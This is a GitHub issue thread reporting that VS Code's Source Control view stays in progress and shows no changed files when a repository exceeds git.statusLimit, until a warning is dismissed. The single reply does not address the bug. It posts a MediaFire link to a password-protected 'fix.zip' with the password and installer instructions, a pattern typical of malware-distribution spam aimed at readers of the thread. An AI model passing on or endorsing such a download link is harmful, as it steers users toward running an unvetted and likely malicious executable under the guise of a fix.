### ISSUE TITLE
Git - Unable to display the change file when the repository has too many active changes

### ISSUE THREAD

**Issue by zWingz** [microsoft/vscode#226574]
Does this issue occur when all extensions are disabled?: Yes

- VS Code Version: latest
- OS Version: macos latest

Steps to Reproduce:

1. find a repository that has more than 10000 files changes (or change the settings `git.statusLimit` to lower number )
2. reload the window

The SCM will be always in progress, The change file didn't come out until I processed the warningMessage
<img width="1068" alt="image" src="https://github.com/user-attachments/assets/323d612a-2a7e-4d15-a9ff-8f08c9ec6e05">
<img width="482" alt="image" src="https://github.com/user-attachments/assets/dc6c5cf5-f74f-4f11-972c-309b226b3e33">
<img width="1060" alt="image" src="https://github.com/user-attachments/assets/57cdcbff-4b8f-4e9d-8ff1-a6b04d667b83">

I don't think the warning box should prevent the change file from appearing. When I don't pay attention to the warning box, it's easy to think that something is wrong with SCM

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
